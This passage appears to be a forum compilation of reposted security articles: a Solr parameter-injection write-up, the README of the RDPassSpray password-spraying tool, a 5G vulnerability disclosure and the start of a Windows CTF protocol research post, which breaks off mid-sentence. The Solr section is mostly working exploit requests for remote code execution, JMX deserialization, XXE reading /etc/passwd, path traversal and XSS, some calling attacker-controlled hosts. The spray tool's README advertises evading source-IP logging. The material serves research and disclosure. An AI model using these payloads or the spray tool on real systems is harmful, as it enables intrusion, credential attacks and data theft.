/solr/db/select?q=Apple&shards=http://127.0.0.1:8983/solr/atom&qt=/update?stream.body=[%257b%2522id%2522:%25221338%2522,%2522author%2522:%2522orange%2522%257d]%26wt=json&commit=true&wt=json Another way to exploit this vulnerability is to alter the Solr response. The "fl" parameter lists the fields that should be returned by the query. For example, by issuing the following requests we are asking to return only 'name' and 'price' fields: GET /solr/db/select?q=Apple&fl=name,price When this parameter is tainted, we can leverage the ValueAugmenterFactory (fl=name:[value v='xxxx']) to inject additional fields to the document, and specify the injected value ('xxxx') right inside the query. Moreover, in conjunction with the Xml Transformer (fl=name: ) we can parse the provided value on the server side and include it to the result document without escaping. This technique may be used for XSS for example: GET /solr/db/select?indent=on&q=*&wt=xml&fl=price,name:[value+v='<a:script+xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>'],name:[xml] p.s. no XXE here unfortunately (at least in 7.6) p.p.s RawValueTransformerFactory is introduced in solr 5.2+ Solr Local Parameters Injection The more often case when only the "q" (query) parameter comes from the untrusted input and it is properly encoded, for example: @RequestMapping("/search") public Object select(@RequestParam(name = "q") String query) { //search the supplied keyword inside solr and return result| return httprequest(solrURL + "/db/select?q=" + urlencode(query)); } In this case it is still possible to specify the parser type and Solr local parameters used by this parser, e.g.: GET /search?q={!type=_parser_type_+param=value}xxx This attack was described back in 2013, but until 2017 nobody knew how to exploit it. In 2017, we reported CVE-2017-12629 and discovered a way how to trigger XXE by using 'xmlparser' parser and escalate it to the Solr parameters injection vulnerability: GET /search?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://127.0.0.1:/solr/gettingstarted/upload?stream.body={"xx":"yy"}&commit=true"'><a></a>'} In other Solr versions where CVE-2017-12629 does not work or patched, the local parameters injection is almost harmless. Well, it could probably be used to cause DoS, but even by using lucene syntax we can make heavy queries, so DoS does not really count here. Another potential way to exploit the local parameters injection is to use Join Query Parser to access the data from another collection: GET /search?q={!join from=id fromIndex=anotherCollection to=other_id}Apple But it not always possible as another collection should contain the same IDs. Therefore, until somebody will find a better way to exploit local parameters injection, I would not consider it as a security vulnerability given that CVE-2017-12629 is patched. Ways to RCE Since attackers normally are not interested in data stored within the cluster (it may be non-sensitive), but rather in achieving RCE or local file read. Fortunately, there is a couple of vulnerabilities allowing it: 1. [CVE-2017-12629] Remote Code Execution via RunExecutableListener Target Solr version: 5.5x-5.5.5, 6x-v6.6.2, 7x - v7.1 Requirements: none The attack leverages Solr ConfigApi to add a new RunExecutableListener that executes a shell command. After you added this listener you need to perform an update operation using /update handler to trigger the command execution. There is the public exploit explained, thanks Olga Barinova for sharing ideas how to exploit it. Exploit via direct connection to a Solr server: POST /solr/db/config HTTP/1.1 Host: localhost:8983 Content-Type: application/json Content-Length: 213 { "add-listener" : { "event":"postCommit", "name":"newlistener", "class":"solr.RunExecutableListener", "exe":"nslookup", "dir":"/usr/bin/", "args":["solrx.x.artsploit.com"] } } Exploit via Solr Parameters Injection: GET /solr/db/select?q=xxx&shards=localhost:8983/solr/db/config%23&stream.body={"add-listener":{"event":"postCommit","name":"newlistener","class":"solr.RunExecutableListener","exe":"nslookup","dir":"/usr/bin/","args":["solrx.x.artsploit.com"]}}&isShard=true GET /solr/db/select?q=xxx&shards=localhost:8983/solr/db/update%23&commit=true Exploit via Solr Local Parameters Injection: GET /solr/db/select?q={!xmlparser+v%3d'<!DOCTYPE+a+SYSTEM+"http%3a//localhost%3a8983/solr/db/select%3fq%3dxxx%26qt%3d/solr/db/config%3fstream.body%3d{"add-listener"%3a{"event"%3a"postCommit","name"%3a"newlistener","class"%3a"solr.RunExecutableListener","exe"%3a"nslookup","dir"%3a"/usr/bin/","args"%3a["solrx.x.artsploit.com"]}}%26shards%3dlocalhost%3a8983/"><a></a>'} GET /solr/db/select?q={!xmlparser+v='<!DOCTYPE+a+SYSTEM+"http://localhost:8983/solr/db/update?commit=true"><a></a>'} For the next exploits we omit the payload strings for "Solr Parameter Injection" and "Solr Parameter Injection", as the logic how they created is the same (using "xmlparser" type in conjunction with "qt" and "stream.body" parameters) 2. [CVE-2019-0192] Deserialization of untrusted data via jmx.serviceUrl Target Solr version: >5? (not sure when config API is introduced) - <7. In version 7 JMX is just ignored. Requirements: Out of band connections from Solr are not firewalled; suitable deserialization gadget exists in the target classpath OR network access to an arbitrary port of the JMX server (this will be opened on the machine where Solr is running during exploitation). ConfigAPI allows to set 'jmx.serviceUrl' property that will create a new JMX MBeans server and register it on the specified RMI/LDAP registry. POST /solr/db/config HTTP/1.1 Host: localhost:8983 Content-Type: application/json Content-Length: 112 { "set-property": { "jmx.serviceUrl": "service:jmx:rmi:///jndi/rmi://artsploit.com:1617/jmxrmi" } } Under the hood, It triggers a JNDI call with the 'bind' operation to the target RMI/LDAP/CORBA server. Unlike JNDI 'lookup' operation, remote classloading is not supported for 'bind' operations, so we cannot just return a reference with an external codebase. At the same time, it creates a new unprotected JMX server via JMXConnectorServer.start(): public static MBeanServer findMBeanServerForServiceUrl(String serviceUrl) throws IOException { if (serviceUrl == null) { return null; } MBeanServer server = MBeanServerFactory.newMBeanServer(); JMXConnectorServer connector = JMXConnectorServerFactory .newJMXConnectorServer(new JMXServiceURL(serviceUrl), null, server); connector.start(); return server; } This call ends up to InitialDirContext.bind(serviceUrl) and then to sun.rmi.transport.StreamRemoteCall.executeCall() (if RMI protocol is used), which contains the desired deserialization sink ObjectInputStream.readObject() It allows to perform two types of attacks: 2.a Attack via deserialization A malicious RMI server could respond with an arbitrary object that will be deserialized on the Solr side using java's ObjectInputStream, which is considered unsafe. The easies way to create a mock RMI server is probably to use the 'ysoserial.exploit.JRMPListener' class form the ysoserial tool. Depending on the target classpath, an attacker can use one of the "gadget chains" to trigger Remote Code Execution on the Solr side. One of the known gadget's applicable here is ROME, since Solr contains "contrib/extraction/lib/rome-1.5.1.jar" library for data extraction, but this library is optional and should be included in the Solr config. Jdk7u21 gadget chain is also worth to try to. [Expand to see steps to reproduce] 2.b Attack via direct access to JMX Another way to exploit this vulnerability is to set up an innocent RMI registry (e.g. by using 'rmiregistry' from JDK) and let Solr to register JMX on it. During this, the target SOLR application creates a JMX MBeans server on a random port and reveals this port to the attacker's RMI Registry. If this port is not firewalled, an attacker can deploy a malicious MBean via java_jmx_server metasploit module or by using mjet. It happens due to the JMX Mbeans server is created without any authentication. [Expand to see steps to reproduce] 3. [CVE-2019-0193] Remote Code Execution via dataImportHandler Target Solr version: 1.3 – 8.2 Requirements: DataImportHandler should be enabled, which is not by default Solr has an optional DataImportHandler that is useful to import data from databases or URLs, It is possible to include arbitrary JavaScript code inside the script tag of dataConfig parameter that will be executed on the Solr server for each imported document. Exploit via direct connection to the Solr server: [Expand to see the properly encoded request] When you test it, make sure the url specified in the 'entity' section is accessible from the Solr side and returns a valid XML document for Xpath evaluation. Another way to exploit DataImportHandler is to use dataSource type "JdbcDataSource" along with the driver "com.sun.rowset.JdbcRowSetImpl": [Expand to see the properly encoded request] In this way we trigger a deserialization attack with the known gadget chain based on the 'com.sun.rowset.JdbcRowSetImpl' class. It requires two setters to be called for 'jndiName' and 'autoCommit' properties and leads us to the vulnerable 'InitialContext.lookup' operation, so we can exploit it as an ordinary JNDI resolution attack. See our Exploiting JNDI Injections article for more information about JNDI attacks. Solr is based on Jetty, hence the Tomcat trick is not applicable here, but you can rely on remote classloading which was fixed for LDAP just quite recently. 4. [CVE-2012-6612, CVE-2013-6407, CVE-2013-6408] XXE in the Update Handler Target Solr version: 1.3 - 4.1 or 4.3.1 Requirements: none If you have a very old version of Solr, it could also be affected by a trivial XXE in the update handler: POST /solr/db/update HTTP/1.1 Host: 127.0.0.1:8983 Content-Type: application/xml Content-Length: 136 <!DOCTYPE x [<!ENTITY xx SYSTEM "/etc/passwd">]> <add> <doc> <field name="id">&xx;</field> </doc> <doc> </doc> </add> 5. [CVE-2013-6397] Remote Code execution via XSLT response writer and path traversal Target Solr version: 1.3 - 4.1 or 4.3.1 Requirements: ability to upload an XLS file to any directory There is a path traversal vulnerability found by Nicolas Grégoire in 2013, he also wrote a good blogpost about it: GET /solr/db/select/?q=31337&wt=xslt&tr=../../../../../../../../../../../../../../../../../usr/share/ant/etc/ant-update.xsl It could lead to a remote code execution if an attacked has ability to upload a custom XSL file using the above-mentioned XXE or another vulnerability. 6. [CVE-2017-3163] Arbitrary file read via path traversal attack in ReplicationHandler Target Solr version: <5.5.4 and <6.4.1 Requirements: none GET /solr/db/replication?command=filecontent&file=../../../../../../../../../../../../../etc/passwd&wt=filestream&generation=1 There is also an unfixed SSRF here, but with the existence of "shards" feature it's hardly considered as a vulnerability: GET /solr/db/replication?command=fetchindex&masterUrl=http://callback/xxxx&wt=json&httpBasicAuthUser=aaa&httpBasicAuthPassword=bbb Black box detection Considering the attacks explained above, whenever a bug hunter discovers a search form on the website that looks like a full text search, it is worth to send the following OOB payloads to detect the presence of this vulnerability: GET /xxx?q=aaa%26shards=http://callback_server/solr GET /xxx?q=aaa&shards=http://callback_server/solr GET /xxx?q={!type=xmlparser v="<!DOCTYPE a SYSTEM 'http://callback_server/solr'><a></a>"} Conclusion No matter whether the Solr instance is facing the internet, behind the reverse proxy, or used only by internal web applications, allowing to modify Solr search parameters is a significant security risk. In cases where only a web application who uses Solr is accessible, by exploitation Solr (local) Parameter Injection it is possible to at least modify or view all the data within the Solr cluster, or even exploit known vulnerabilities to achieve remote code execution. Special Thanks Nicolas Grégoire - for the wonderful CVE-2013-6397 Olga Barinova - for the incredible idea how to exploit CVE-2017-12629 Apache Solr Team - for timely fixing all of these vulnerabilities Authors Michael Stepankin, Veracode Research Sursa: https://github.com/artsploit/solr-injection/
  15. RDPassSpray RDPassSpary is a python tool to perform password spray attack in a Microsoft domain environment. ALWAYS VERIFY THE LOCKOUT POLICY TO PREVENT LOCKING USERS. How to use it First, install the needed dependencies: pip3 install -r requirements.txt Second, make sure you have xfreerdp: apt-get install python-apt apt-get install xfreerdp Last, run the tool with the needed flags: python3 RDPassSpray.py -u [USERNAME] -p [PASSWORD] -d [DOMAIN] -t [TARGET IP] Options to consider -p-P single password or file with passwords (one each line) -u-U single username or file with usernames (one each line) -n list of hostname to use when authenticating (more details below) -o output file name (csv) -s throttling time (in seconds) between attempts -r random throttling time between attempts (based on user input for min and max values) Advantages for this technique Failed authentication attempts will produce event ID 4625 ("An account failed to log on") BUT: the event won't have the source ip of the attacking machine: The event will record the hostname provided to the tool: Tested OS Currently was test on Kali Rolling against Windows Server 2012 Domain Controller I didn't had a full logged environment for deeper testing, if you have one, please let me know how it looks on other systems. Sample Credit This tools is based on the POC made by @dafthack - https://github.com/dafthack/RDPSpray Issues, bugs and other code-issues Yeah, I know, this code isn't the best. I'm fine with it as I'm not a developer and this is part of my learning process. If there is an option to do some of it better, please, let me know. Not how many, but where. Sursa: https://github.com/xFreed0m/RDPassSpray
  16. New vulnerabilities in 5G Security Architecture & Countermeasures (Part 1) Skrevet 8. August 2019 av Ravishankar Borgaonkar The 5G network promises to transform industries and our digital society by providing enhanced capacity, higher data rates, increased battery life for machine-type devices, higher availability and reduced power consumptions. In a way, 5G will act as a vehicle to drive much needed digital transformation race and will push the world into the information age. Also, 5G can be used to replace the existing emergency communication network infrastructures. Many countries are about to launch 5G services commercially as 5G standards have been developed by the 3GPP group, including security procedures. The following map in Figure 1 shows 5G deployments worldwide. Figure 1 : 5G deployments worldwide [1] With every generation from 2G to 5G, wireless security (over the air security between mobile phones and cellular towers) has been improving to address various threats. For example, 5G introduced additional security measures to counteract fake base station type of attacks (also known as IMSI catchers or Stingray). Thus, the privacy of mobile subscribers while using 5G networks is much better than previous generations. However, some of the wireless functionalities that existed in 4G are re-used in 5G. For example, the 3GPP standards group has designed several capabilities in 4G and 5G specifications to support a wide range of applications including smart homes, critical infrastructure, industry processes, HD media delivery, automated cars, etc. In simple words, such kind of capabilities means telling the cellular network that I am a mobile device or a car or IoT device to receive special network services. These capabilities play an essential role for the right operation of the device with respect to its application. In particular, they define the speed, frequency bands, security parameters, application-specific parameters such as telephony capabilities of the device. This allows the network to recognise the application type and accordingly offer the appropriate service. For example, an automated car indicates its Vehicle-2-Vehicle (V2V) support to the network and receives the required parameters to establish communication with surrounding vehicles. Over the last several months Dr. Ravishankar Borgaonkar together with Altaf Shaik, Shinjo Park and Prof. Jean-Pierre Seifert (SecT, TU Berlin, Germany) experimented with 5G and 4G device capabilities both in the laboratory setting and real networks. This joint study uncovers the following vulnerabilities: Vulnerabilities in 5G A protocol vulnerability in 4G and 5G specification TS 33.410 [2] and TS 33.501 [3] that allows the fake base station to steal information about the device and mount identification attacks Implementation vulnerability in cellular network operator equipment that can be exploited during a device registration phase A protocol vulnerability in the first release of LTE NB-IoT that affects the battery life of low-powered devices Potential Attacks An adversary can mount active or passive attacks by exploiting above three vulnerabilities. In active attacks, he or she can act as a man-in-the-middle attacker to alter device capabilities. Another important point is that such attacks can be carried out using low-cost hardware/software setup. As shown in Figure 2, we use about 2000 USD setup to demonstrate attack feasibility and subsequent impacts. Figure 2: Experimental setup for MiTM attack [4] In particular, we demonstrated following Man-in-the-middle (MiTM) attacks – Fingerprinting Attacks – An active adversary can intercept device capabilities and identify the type of devices on a mobile network and intellectually estimate the underlying applications. To demonstrate impact, we performed a Mobile Network Mapping (MNmap) attack which results in device type identification levels as shown in Figure 3. Downgrading Attacks – An active adversary can also alter radio capabilities to downgrade network services. For example, VoLTE calls can be denied to a particular mobile phone during the attack. Battery Drain Attacks – Starting from 4G networks, there is Power Saving Mode (PSM) defined in the specifications. All cellular devices can request the use of PSM by including a timer T3324 during the registration procedure. When PSM is in use, the 3GPP standard indicates to turn off the radio baseband of the device and thus the radio operations but however, applications on the device (or sensors) can still operate depending on the device settings. An adversary can remove the use of PSM feature from the device capability list during the registration phase, resulting in loss of battery power. In our experiment with NB-IoT device, a power drain attack reduces the battery life by a factor of 5. Figure 3: Device type identification levels [4] More detailed information about above attacks, feasibility and their impact can be found in our full paper, titled “New vulnerabilities in 4G and 5G cellular access network protocols: exposing device capabilities” [4]. Responsible Disclosure We discovered the vulnerabilities and attacks earlier this year. We followed responsible disclosure procedure and notified GSMA through their Coordinated Vulnerability Disclosure (CVD) Programme. In parallel, we also notified 3GPP who is responsible for designing 4G/5G security specifications and affected mobile network operators. Research Impact & Countermeasures We suggested in [4] that 3GPP should consider mandating security protection for device capabilities. In particular, Device Capability Enquiry message carrying radio access capabilities should be accessible/requested by the eNodeB ( a base station in 4G or 5G for example) only after establishing RRC security. This will prevent a MitM attacker from hijacking those capabilities. Consequently, fixing these vulnerabilities will help in mitigating IMSI catcher or fake base station types of attacks against 5G networks. On the network operator side, eNodeB configuration or implementation should be changed such that a eNodeB should request Device Capability Information only after establishing a radio security association. This is a relatively easy fix and can be implemented by the operators either as a software update or a configurational change on their eNodeBs. Nevertheless, in practice, only a minor number of operators are acquiring capabilities after security setup. The difference among various operators we tested clearly indicates that this could be either an implementation or configuration problem. While working with GSMA through their Coordinated Vulnerability Disclosure (CVD) Programme, we received confirmation (with CVD-2019-0018 number) last week during the Device Security Group meeting in San Francisco that 3GPP SA3, a group that standardizes 5G security, has agreed to fix the vulnerabilities identified by us in [4]. Following is a snapshot of countermeasures to be added to the 4G [2] and 5G [3] specification respectively – 3GPP SA3 response to fix specification vulnerabilities Even though fixes will be implemented into 4G and 5G standards in coming months, baseband vendors need longer periods (as compared with normal Android or iOS software updates) to update their basebands and hence attackers can still exploit this vulnerability against 4G and 5G devices. A summery of our findings, potential attack, their impact and countermeasures are shown in the following table 1 [4]. In part 2, we will be publishing our work on improving 5G and 4G Authentication and Key Agreement (AKA) protocol to mitigate mobile subscriber privacy issues. Also, we outline AKA protocol related network configuration issues in deployed 4G networks worldwide. References: 5G commercial network world coverage map: 5G field testing / 5G trials / 5G research / 5G development by country (June 15, 2019) https://www.worldtimezone.com/5g.html 3GPP. 2018. 3GPP System Architecture Evolution (SAE); Security architecture. Technical Specification (TS) 33.401. 3rd Generation Partnership Project (3GPP). http://www.3gpp.org/DynaReport/33401.htm 3GPP. 2018. Security architecture and procedures for 5G System. Technical Specification (TS) 33.501. 3rd Generation Partnership Project (3GPP). http: //www.3gpp.org/DynaReport/33501.htm Altaf Shaik, Ravishankar Borgaonkar, Shinjo Park, and Jean-Pierre Seifert. 2019. New vulnerabilities in 4G and 5G cellular access network protocols: exposing device capabilities. In Proceedings of the 12th Conference on Security and Privacy in Wireless and Mobile Networks (WiSec ’19). ACM, New York, NY, USA, 221-231. DOI: https://doi.org/10.1145/3317549.3319728 Publisert i kategorien Ukategorisert med stikkordene . Sursa: https://infosec.sintef.no/en/informasjonssikkerhet/2019/08/new-vulnerabilities-in-5g-security-architecture-countermeasures/
  17. Tuesday, August 13, 2019 Down the Rabbit-Hole... Posted by Tavis Ormandy, Security Research Over-Engineer. “Sometimes, hacking is just someone spending more time on something than anyone else might reasonably expect.”[1] I often find it valuable to write simple test cases confirming things work the way I think they do. Sometimes I can’t explain the results, and getting to the bottom of those discrepancies can reveal new research opportunities. This is the story of one of those discrepancies; and the security rabbit-hole it led me down. It all seemed so clear.. Usually, windows on the same desktop can communicate with each other. They can ask each other to move, resize, close or even send each other input. This can get complicated when you have applications with different privilege levels, for example, if you “Run as administrator”. It wouldn’t make sense if an unprivileged window could just send commands to a highly privileged window, and that’s what UIPI, User Interface Privilege Isolation, prevents. This isn’t a story about UIPI, but it is how it began. The code that verifies you’re allowed to communicate with another window is part of win32k!NtUserPostMessage. The logic is simple enough, it checks if the application explicitly allowed the message, or if it’s on a whitelist of harmless messages. BOOL __fastcall IsMessageAlwaysAllowedAcrossIL(DWORD Message) { BOOL ReturnCode; // edx BOOL IsDestroy; // zf ReturnCode = FALSE; if... switch ( Message ) { case WM_PAINTCLIPBOARD: case WM_VSCROLLCLIPBOARD: case WM_SIZECLIPBOARD: case WM_ASKCBFORMATNAME: case WM_HSCROLLCLIPBOARD: ReturnCode = IsFmtBlocked() == 0; break; case WM_CHANGECBCHAIN: case WM_SYSMENU: case WM_THEMECHANGED: return 1; default: return ReturnCode; } return ReturnCode; } Snippet of win32k!IsMessageAlwaysAllowsAcrossIL showing the whitelist of allowed messages, what could be simpler.... ? I wrote a test case to verify it really is as simple as it looks. If I send every possible message to a privileged window from an unprivileged process, the list should match the whitelist in win32k!IsMessageAlwaysAllowedAcrossIL and I can move onto something else. Ah, I was so naive. The code I used is available here, and a picture of the output is below. What the...?! Scanning which messages are allowed across IL produces unexpected results. The tool showed that unprivileged applications were allowed to send messages in the 0xCNNN range to most of the applications I tested, even simple applications like Notepad. I had no idea message numbers even went that high! Message numbers use predefined ranges, the system messages are in the range 0 - 0x3FF. Then there’s the WM_USER and WM_APP ranges that applications can use for their own purposes. This is the first time I’d seen a message outside of those ranges, so I had to look it up. The following are the ranges of message numbers. Range Meaning 0 through WM_USER –1 Messages reserved for use by the system. WM_USER through 0x7FFF Integer messages for use by private window classes. WM_APP (0x8000) through 0xBFFF Messages available for use by applications. 0xC000 through 0xFFFF String messages for use by applications. Greater than 0xFFFF Reserved by the system. This is a snippet from Microsoft’s WM_USER documentation, explaining reserved message ranges. Uh, string messages? The documentation pointed me to RegisterWindowMessage(), which lets two applications agree on a message number when they know a shared string. I suppose the API uses Atoms, a standard Windows facility. My first theory was that RegisterWindowMessage() automatically calls ChangeWindowMessageFilterEx(). That would explain my results, and be useful information for future audits.... but I tested it and that didn’t work! ...Something must be explicitly allowing these messages! I needed to find the code responsible to figure out what is going on. Tracking down the culprit... I put a breakpoint on USER32!RegisterWindowMessageW, and waited for it to return one of the message numbers I was looking for. When the breakpoint hits, I can look at the stack and figure out what code is responsible for this. $ cdb -sxi ld notepad.exe Microsoft (R) Windows Debugger Version 10.0.18362.1 AMD64 Copyright (c) Microsoft Corporation. All rights reserved. CommandLine: notepad.exe (a54.774): Break instruction exception - code 80000003 (first chance) ntdll!LdrpDoDebuggerBreak+0x30: 00007ffa`ce142dbc cc int 3 0:000> bp USER32!RegisterWindowMessageW "gu; j (@rax != 0xC046) 'gc'; ''" 0:000> g 0:000> r @rax rax=000000000000c046 0:000> k Child-SP RetAddr Call Site 0000003a`3c9ddab0 00007ffa`cbc4a010 MSCTF!EnsurePrivateMessages+0x4b 0000003a`3c9ddb00 00007ffa`cd7f7330 MSCTF!TF_Notify+0x50 0000003a`3c9ddc00 00007ffa`cd7f1a09 USER32!CtfHookProcWorker+0x20 0000003a`3c9ddc30 00007ffa`cd7f191e USER32!CallHookWithSEH+0x29 0000003a`3c9ddc80 00007ffa`ce113494 USER32!_fnHkINDWORD+0x1e 0000003a`3c9ddcd0 00007ffa`ca2e1f24 ntdll!KiUserCallbackDispatcherContinue 0000003a`3c9ddd58 00007ffa`cd7e15df win32u!NtUserCreateWindowEx+0x14 0000003a`3c9ddd60 00007ffa`cd7e11d4 USER32!VerNtUserCreateWindowEx+0x20f 0000003a`3c9de0f0 00007ffa`cd7e1012 USER32!CreateWindowInternal+0x1b4 0000003a`3c9de250 00007ff6`5d8889f4 USER32!CreateWindowExW+0x82 0000003a`3c9de2e0 00007ff6`5d8843c2 notepad!NPInit+0x1b4 0000003a`3c9df5f0 00007ff6`5d89ae07 notepad!WinMain+0x18a 0000003a`3c9df6f0 00007ffa`cdcb7974 notepad!__mainCRTStartup+0x19f 0000003a`3c9df7b0 00007ffa`ce0da271 KERNEL32!BaseThreadInitThunk+0x14 0000003a`3c9df7e0 00000000`00000000 ntdll!RtlUserThreadStart+0x21 So.... wtf is ctf? A debugging session trying to find who is responsible for these windows messages. The debugger showed that while the kernel is creating a new window on behalf of a process, it will invoke a callback that loads a module called “MSCTF”. That library is the one creating these messages and changing the message filters. The hidden depths reveal... It turns out CTF[2] is part of the Windows Text Services Framework. The TSF manages things like input methods, keyboard layouts, text processing and so on. If you change between keyboard layouts or regions, use an IME like Pinyin or alternative input methods like handwriting recognition then that is using CTF. The only discussion on the security of Text Services I could find online was this snippet from the “New Features” page: “The security and robustness of TSF have been substantially improved, to reduce the likelihood of a hostile program being able to access the stack, heap, or other secure memory locations.“ I’m glad the security has been substantially improved, but it really doesn’t inspire much confidence that those things used to be possible. I decided it would be worth it to spend a couple of weeks reverse engineering CTF to understand the security properties. So... how does it all work? You might have noticed the ctfmon service in task manager, it is responsible for notifying applications about changes in keyboard layout or input methods. The kernel forces applications to connect to the ctfmon service when they start, and then exchange messages with other clients and receive notifications from the service. A ctfmon process is started for each Desktop and session. Consider the example of an IME, Input Method Editor, like Microsoft Pinyin. If you set your language to Chinese in Windows, you will get Microsoft Pinyin installed by default. This is what Microsoft Pinyin looks like. Other regions have other IMEs, if your language is set to Japanese you get Microsoft JP-IME, and so on. These IMEs require another process to see what is being entered on the keyboard, and to change and modify the text, and the ctf service is responsible for arranging this. An IME application is an example of an out-of-process TIP, Text Input Processor. There are other types of TIP, and CTF supports many. Understanding the CTF Protocol... A CTF monitor service is spawned for each new desktop and session, and creates an ALPC port called \BaseNamedObjects\msctf.server<DesktopName><SessionId>. The ctf server ALPC port contains the desktop name and the session id. When any process creates a window, the kernel invokes a callback, USER32!CtfHookProcWorker, that automatically loads the CTF client. The client connects to the ALPC port, and reports its HWND, thread and process id. typedef struct _CTF_CONNECT_MSG { PORT_MESSAGE Header; DWORD ProcessId; DWORD ThreadId; DWORD TickCount; DWORD ClientFlags; union { UINT64 QuadWord; HWND WindowId; }; } CTF_CONNECT_MSG, *PCTF_CONNECT_MSG; This is the initial handshake message clients send to connect to the CTF session. The protocol is entirely undocumented, and these structures were reverse engineered. The server continuously waits for messages from clients, but clients only look for messages when notified via PostMessage(). This is the reason that clients call RegisterWindowMessage() on startup! Clients can send commands to the monitor, or ask the monitor to forward commands to other clients by specifying the destination thread id. typedef struct _CTF_MSGBASE { PORT_MESSAGE Header; DWORD Message; DWORD SrcThreadId; DWORD DstThreadId; DWORD Result; union { struct _CTF_MSGBASE_PARAM_MARSHAL { DWORD ulNumParams; DWORD ulDataLength; UINT64 pData; }; DWORD Params[3]; }; } CTF_MSGBASE, *PCTF_MSGBASE; Messages can be sent to any connected thread, or the monitor itself by setting the destination to thread zero. Parameters can be appended, or if you only need some integers, you can include them in the message. There are dozens of commands that can be sent, many involve sending or receiving data or instantiating COM objects. Many commands require parameters, so the CTF protocol has a complex type marshaling and unmarshaling system. typedef struct _CTF_MARSHAL_PARAM { DWORD Start; DWORD Size; DWORD TypeFlags; DWORD Reserved; } CTF_MARSHAL_PARAM, *PCTF_MARSHAL_PARAM; Marshalled parameters are appended to messages. If you want to send marshalled data to an instantiated COM object, the monitor will “proxy” it for you. You simply prepend a PROXY_SIGNATURE structure that describes which COM object you want it forwarded to. typedef struct _CTF_PROXY_SIGNATURE { GUID Interface; DWORD FunctionIndex; DWORD StubId; DWORD Timestamp; DWORD field_1C; // I've never seen these fields used DWORD field_20; DWORD field_24; } CTF_PROXY_SIGNATURE, *PCTF_PROXY_SIGNATURE; You can even call methods on COM objects. Suffice to say, CTF is vast and complex. The CTF system was most likely designed for LPC in Windows NT and bolted onto ALPC when it became available in Vista and later. The code is clearly dated with many legacy design decisions. In fact, the earliest version of MSCTF I've been able to find was from the 2001 release of Office XP, which even supported Windows 98. It was later included with Windows XP as part of the base operating system. CTF has been part of Windows since XP, but ctftool only supports ALPC, which was introduced in Vista. In Windows Vista, Windows 7 and Windows 8, the monitor was run as a task inside taskhost.exe. ctftool supports Windows 7, and I verified all the bugs described in this document still exist.[3] In fact, the entire ctf system has changed very little since Vista. The monitor is a standalone process again in Windows 10, but the protocol has still barely changed. Is there any attack surface? Firstly, there is no access control whatsoever! Any application, any user - even sandboxed processes - can connect to any CTF session. Clients are expected to report their thread id, process id and HWND, but there is no authentication involved and you can simply lie. Secondly, there is nothing stopping you pretending to be a CTF service and getting other applications - even privileged applications - to connect to you. Even when working as intended, CTF could allow escaping from sandboxes and escalating privileges. This convinced me that my time would be well spent reverse engineering the protocol. Sample output from my command line tool. This was a bigger job than I had anticipated, and after a few weeks I had built an interactive command-line CTF client called ctftool. To reach parts of the CTF protocol that looked dangerous, I even had to develop simple scripting capabilities with control flow, arithmetic and variables! Exploring CTF with ctftool... Using ctftool you can connect to your current session and view the connected clients. > .\ctftool.exe An interactive ctf exploration tool by @taviso. Type "help" for available commands. Most commands require a connection, see "help connect". ctf> connect The ctf server port is located at \BaseNamedObjects\msctf.serverDefault2 NtAlpcConnectPort("\BaseNamedObjects\msctf.serverDefault2") => 0 Connected to CTF server@\BaseNamedObjects\msctf.serverDefault2, Handle 00000224 ctf> scan Client 0, Tid 5100 (Flags 0x08, Hwnd 000013EC, Pid 4416, explorer.exe) Client 1, Tid 5016 (Flags 0x08, Hwnd 00001398, Pid 4416, explorer.exe) Client 2, Tid 7624 (Flags 0x08, Hwnd 00001DC8, Pid 4416, explorer.exe) Client 3, Tid 4440 (Flags 0x0c, Hwnd 00001158, Pid 5776, SearchUI.exe) Client 4, Tid 7268 (Flags 0000, Hwnd 00001C64, Pid 7212, ctfmon.exe) Client 5, Tid 6556 (Flags 0x08, Hwnd 0000199C, Pid 7208, conhost.exe) Client 6, Tid 5360 (Flags 0x08, Hwnd 000014F0, Pid 5512, vmtoolsd.exe) Client 7, Tid 812 (Flags 0x08, Hwnd 0000032C, Pid 6760, OneDrive.exe) Client 8, Tid 6092 (Flags 0x0c, Hwnd 000017CC, Pid 7460, LockApp.exe) Client 9, Tid 6076 (Flags 0000, Hwnd 000017BC, Pid 5516, ctftool.exe) Not only can you send commands to the server, you can wait for a particular client to connect, and then ask the server to forward commands to it as well! Let's start a copy of notepad, and wait for it to connect to our CTF session... Connecting to another client on the same CTF session. Now we can ask notepad to instantiate certain COM objects by specifying the CLSID. If the operation is successful, it returns what's called a “stub”. That stub lets us interact with the instantiated object, such as invoking methods and passing it parameters. Let’s instantiate a ITfInputProcessorProfileMgr object. ctf> createstub 0 5 IID_ITfInputProcessorProfileMgr Command succeeded, stub created Dumping Marshal Parameter 3 (Base 012EA8F8, Type 0x106, Size 0x18, Offset 0x40) 000000: 4c e7 c6 71 28 0f d8 11 a8 2a 00 06 5b 84 43 5c L..q(....*..[.C\ 000010: 01 00 00 00 bb ee b7 00 ........ Marshalled Value 3, COM {71C6E74C-0F28-11D8-A82A-00065B84435C}, ID 1, Timestamp 0xb7eebb That worked, and now we can refer to this object by its “stub id”. This object can do things like change the input method, enumerate available languages, and so on. Let's call ITfInputProcessorProfileMgr::GetActiveProfile, this method is documented so we know it takes two parameters: A GUID, and a buffer to store a TF_INPUTPROCESSORPROFILE. Ctftool can generate these parameters, then request notepad proxy them to the COM object. ctf> setarg 2 New Parameter Chain, Length 2 ctf> setarg 1 34745c63-b2f0-4784-8b67-5e12c8701a31 Dumping Marshal Parameter 0 (Base 012E8E90, Type 0x1, Size 0x10, Offset 0x20) Possibly a GUID, {34745C63-B2F0-4784-8B67-5E12C8701A31} ctf> # just generating a 0x48 byte buffer ctf> setarg 0x8006 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" Dumping Marshal Parameter 1 (Base 012E5010, Type 0x8006, Size 0x48, Offset 0x30) Marshalled Value 1, DATA ctf> callstub 0 0 10 Command succeeded. Parameter 1 has the output flag set. Dumping Marshal Parameter 1 (Base 012E5010, Type 0x8006, Size 0x48, Offset 0x20) 000000: 02 00 00 00 09 04 00 00 00 00 00 00 00 00 00 00 ................ 000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000020: 00 00 00 00 00 00 00 00 63 5c 74 34 f0 b2 84 47 ........c\t4...G 000030: 8b 67 5e 12 c8 70 1a 31 00 00 00 00 09 04 09 04 .g^..p.1........ 000040: 00 00 00 00 03 00 00 00 ........ Marshalled Value 1, DATA You can see notepad filled in the buffer we 